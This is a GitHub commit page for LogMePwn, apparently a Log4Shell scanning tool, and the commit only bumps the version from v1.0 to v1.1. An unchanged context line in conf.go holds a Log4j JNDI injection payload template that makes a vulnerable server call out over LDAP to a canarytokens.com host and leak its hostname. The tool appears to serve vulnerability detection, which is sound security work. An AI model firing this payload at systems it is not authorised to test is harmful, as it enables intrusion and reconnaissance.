Skip to content

Commit

Permalink
added checksums
Browse files Browse the repository at this point in the history
  • Loading branch information
0xInfection committed Dec 18, 2021
1 parent 1c434a2 commit 3c224d3
Show file tree
Hide file tree
Showing 2 changed files with 3 additions and 3 deletions.
4 changes: 2 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -15,7 +15,7 @@ $ ./lmp --help
+---------------------+
| L o g M e P w n |
+---------------------+ v1.0
+---------------------+ v1.1
~ 0xInfection
Usage:
Expand Down Expand Up @@ -165,7 +165,7 @@ Which immediately triggered a few DNS lookups visible on the token history page
Please add your comment to [this issue](https://github.com/0xInfection/LogMePwn/issues/1).

## License & Version
The tool is licensed under the GNU GPLv3. LogMePwn is currently at v1.0.
The tool is licensed under the GNU GPLv3. LogMePwn is currently at v1.1.

## Credits
Shoutout to the team at [Thinkst Canary](https://canary.tools/) for their amazing Canary Tokens project.
Expand Down
2 changes: 1 addition & 1 deletion conf.go
Original file line number Diff line number Diff line change
Expand Up @@ -75,7 +75,7 @@ type (
)

const (
version = "v1.0"
version = "v1.1"
letterBytes = "abcdefghijklmnopqrstuvwxyz0123456789"
maxWorkers = 100
canaryTokenFormat = "${jndi:ldap://x${hostName}.L4J.%s.canarytokens.com/a}"
Expand Down

0 comments on commit 3c224d3

Please sign in to comment.